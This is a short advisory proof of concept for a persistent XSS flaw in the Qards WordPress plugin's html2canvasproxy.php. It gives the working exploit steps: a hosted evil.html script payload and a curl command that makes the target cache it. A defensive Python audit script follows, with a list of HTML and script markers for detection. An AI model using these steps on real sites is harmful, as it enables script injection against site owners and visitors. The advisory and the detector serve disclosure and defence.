Proof of Concept
The vulnerable script http://target/wp-content/plugins/qards/html2canvasproxy.php
gets the value of the "url" parameter and, using PHP cURL functions, saves the website's content to a file at /wp-content/plugins/qards/images/ with a filename formatted as follows:
On a web server with "Directory Listing" enabled, you could easily find that file.
Due to improper sanitization, the generated file suffers from a persistent XSS vulnerability.
1. Create a remote file (evil.html) on your web server with the following content:
<script> alert('XSS'); </script>
2. curl 'http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://yourserver/evil.html'
3. Browse to http://target/wp-content/plugins/qards/images/ to get the file
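An added audit check, not part of the original advisory or the plugin's code: it walks a local copy of the plugin's images directory and flags cached files that are not images or that contain HTML markup. The marker list, function names and sample files are assumptions constructed for illustration.

```python
import os
import tempfile

# Leading magic bytes of image types a canvas proxy would legitimately cache.
IMAGE_MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")
# Markers of active HTML content (matched case-insensitively); assumed list.
HTML_MARKERS = (b"<script", b"<html", b"<iframe", b"<svg", b"onerror=", b"onload=")


def classify(data):
    """Return the reasons a cached file is suspicious (empty list if clean)."""
    reasons = []
    if not data.startswith(IMAGE_MAGIC):
        reasons.append("not-an-image")
    lowered = data.lower()
    if any(marker in lowered for marker in HTML_MARKERS):
        reasons.append("html-markup")
    return reasons


def audit_cache_dir(path):
    """Walk the cache directory; map each suspicious file to its reasons."""
    findings = {}
    for root, _dirs, files in os.walk(path):
        for name in sorted(files):
            full = os.path.join(root, name)
            with open(full, "rb") as fh:
                reasons = classify(fh.read(1024 * 1024))  # inspect first 1 MiB
            if reasons:
                findings[os.path.relpath(full, path)] = reasons
    return findings


def demo():
    """Run the audit over constructed sample files in a temporary directory."""
    samples = {
        "cached_ok.png": IMAGE_MAGIC[0] + b"\x00" * 16,           # constructed
        "cached_page.html": b"<script> alert('XSS'); </script>",  # page's payload
        "cached_note.txt": b"plain text, no markup",              # constructed
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in samples.items():
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(body)
        return audit_cache_dir(tmp)


if __name__ == "__main__":
    print(demo())
```

Point `audit_cache_dir` at the on-disk path of `/wp-content/plugins/qards/images/` to review what the proxy has already stored.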